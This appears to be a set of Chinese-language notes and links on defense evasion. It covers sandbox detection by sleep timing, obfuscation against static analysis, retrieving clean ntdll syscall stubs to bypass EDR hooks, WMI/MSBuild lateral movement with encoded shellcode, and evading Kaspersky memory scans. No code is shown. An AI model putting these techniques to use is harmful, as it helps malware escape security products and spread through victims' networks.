创建一个只有sleep的线程,sleep 23s,使用WaitForSingleObject设定超时20s,正常情况下肯定会超时,在沙箱中sleep加速,则不会超时。 在代码中加入无用判断、循环与赋值,增加静态分析的难度,并针对许多容易被检测到的字符串和函数都进行间接的赋值与获取
神仙项目
- https://github.com/LordNoteworthy/al-khaser
- 神仙项目,总结了反调试,反沙箱,反虚拟机等等技术
之前使用地狱之门那种方式从磁盘读取获取ntdll syscall stub,需要调用几个ntdll的API难免涉及到鸡和蛋问题。下面这个项目则是创建挂起的子进程,此时进程初始化尚未完成,起码主线程还未创建,不会触发进程创建回调函数,EDR也不会注入dll hook ntdll,然后通过NtReadVirtualMemory获取pure stub。因为读取的是自己创建的子进程,也不会太敏感,完成后直接终止进程。
https://github.com/plackyhacker/Peruns-Fart
WMEye是一个实验性工具,是在探索Windows WMI时开发的。该工具是为使用WMI和远程MSBuild执行进行横向移动而开发的。它将编码/加密的shellcode上传到远程目标的WMI类属性中,创建一个事件过滤器,当被触发时使用一个特殊的WMI类LogFileEventConsumer写一个基于MSBuild的有效载荷,最后远程执行有效载荷。 https://github.com/pwn1sher/WMEye
杀软行为分析
杀软在 system 进程中加载了不同功能的驱动:
我们可以简单瞅瞅里面的驱动,先以 360FsFlt.sys 为例子:
根据导入表中的回调函数,可见该驱动对进程、线程、模块、对象及注册表均进行了相应
的监控操作
再往后看,像比较敏感的 explorer、wscript 等程序运行时也会挂载相应的 dll

免杀框架内容+1 生成可内存执行的vba golang编写
- https://github.com/optiv/Ivy
syscall的前世今生
- https://tttang.com/archive/1464/
https://9bie.org/index.php/archives/796/ cs bypass卡巴斯基内存查杀--BIE实现
- https://9bie.org/index.php/archives/796/
对内存x属性隐藏,在需要时再加上x属性。打一个卡巴内存扫描的时间差。